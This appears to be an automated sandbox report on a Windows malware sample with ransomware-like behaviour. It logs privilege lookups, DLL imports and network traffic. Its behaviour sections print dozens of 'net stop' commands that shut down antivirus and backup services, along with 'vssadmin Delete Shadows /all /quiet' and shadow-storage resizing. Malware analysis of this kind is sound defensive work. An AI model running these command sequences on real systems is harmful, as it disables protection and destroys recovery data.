system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396145.827374
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396149.420751
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396149.999876
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396150.842001
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396151.452374
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396152.014499
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396152.639251
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
1619396153.233251
LookupPrivilegeValueW
system_name:
privilege_name: SeBackupPrivilege
success 1 0
Uses Windows utilities for basic Windows functionality (50 out of 68 个事件)
cmdline net stop MsDtsServer110 /y
cmdline net stop McShield /y
cmdline cmd.exe /c net stop EPSecurityService /y
cmdline cmd.exe /c net stop BackupExecAgentBrowser /y
cmdline net stop MsDtsServer /y
cmdline net stop DCAgent /y
cmdline net stop MsDtsServer100 /y
cmdline cmd.exe /c net stop FA_Scheduler /y
cmdline cmd.exe /c net stop BackupExecVSSProvider /y
cmdline cmd.exe /c net stop AcronisAgent /y
cmdline net stop BackupExecVSSProvider /y
cmdline cmd.exe /c net stop "SQLsafe Backup Service" /y
cmdline cmd.exe /c net stop "SQLsafe Filter Service" /y
cmdline net stop EPUpdateService /y
cmdline net stop "Veeam Backup Catalog Data Service" /y
cmdline cmd.exe /c net stop BackupExecManagementService /y
cmdline net stop "SQLsafe Backup Service" /y
cmdline net stop MMS /y
cmdline cmd.exe /c net stop McShield /y
cmdline cmd.exe /c net stop Antivirus /y
cmdline net stop EPSecurityService /y
cmdline cmd.exe /c net stop "Enterprise Client Service" /y
cmdline cmd.exe /c net stop BackupExecRPCService /y
cmdline cmd.exe /c net stop BackupExecDeviceMediaService /y
cmdline net stop Antivirus /y
cmdline cmd.exe /c net stop mfemms /y
cmdline cmd.exe /c net stop McTaskManager /y
cmdline net stop BackupExecAgentAccelerator /y
cmdline net stop bedbg /y
cmdline cmd.exe /c net stop mozyprobackup /y
cmdline net stop IISAdmin /y
cmdline cmd.exe /c net stop MsDtsServer /y
cmdline net stop McTaskManager /y
cmdline cmd.exe /c net stop AcrSch2Svc /y
cmdline cmd.exe /c net stop "Acronis VSS Provider" /y
cmdline cmd.exe /c net stop DCAgent /y
cmdline net stop mfevtp /y
cmdline cmd.exe /c net stop EsgShKernel /y
cmdline net stop BackupExecRPCService /y
cmdline net stop "SQLsafe Filter Service" /y
cmdline cmd.exe /c net stop ARSM /y
cmdline net stop BackupExecAgentBrowser /y
cmdline net stop mfemms /y
cmdline cmd.exe /c net stop MMS /y
cmdline net stop FA_Scheduler /y
cmdline cmd.exe /c net stop IMAP4Svc /y
cmdline net stop BackupExecManagementService /y
cmdline cmd.exe /c net stop EraserSvc11710 /y
cmdline net stop BackupExecJobEngine /y
cmdline cmd.exe /c net stop bedbg /y
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Removes the Shadow Copy to avoid recovery of the system (1 个事件)
cmdline vssadmin Delete Shadows /all /quiet
Uses suspicious command line tools or Windows utilities (26 个事件)
cmdline vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
cmdline cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
cmdline vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
cmdline cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
cmdline vssadmin Delete Shadows /all /quiet
cmdline vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
cmdline cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
cmdline cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
cmdline cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
cmdline vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
cmdline vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
cmdline vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
cmdline vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
cmdline cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
cmdline cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
cmdline cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
cmdline vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
cmdline vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
cmdline cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
cmdline vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
cmdline vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
cmdline cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
cmdline cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
cmdline vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
cmdline cmd.exe /c vssadmin Delete Shadows /all /quiet
cmdline cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 个事件)
dead_host 172.217.24.14:443
dead_host 216.58.200.238:443
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-06-04 08:02:10

Imports

Library SHLWAPI.dll:
0x419030 StrStrIA
Library KERNEL32.dll:
0x419000 GetCommandLineW
0x419004 lstrcpyA
0x419008 LoadLibraryA
0x41900c GetProcAddress
0x419010 lstrcmpiW
0x419014 CreateMutexA
0x419018 ReleaseMutex
0x41901c MultiByteToWideChar
0x419020 CloseHandle
Library SHELL32.dll:
0x419028 CommandLineToArgvW

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.56.101 51808 114.114.114.114 53
192.168.56.101 60123 114.114.114.114 53
192.168.56.101 60215 114.114.114.114 53
192.168.56.101 60384 114.114.114.114 53
192.168.56.101 63429 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49713 224.0.0.252 5355
192.168.56.101 51378 224.0.0.252 5355
192.168.56.101 53237 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56539 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 58367 224.0.0.252 5355
192.168.56.101 61680 224.0.0.252 5355
192.168.56.101 62318 224.0.0.252 5355
192.168.56.101 65004 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 51379 239.255.255.250 3702

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.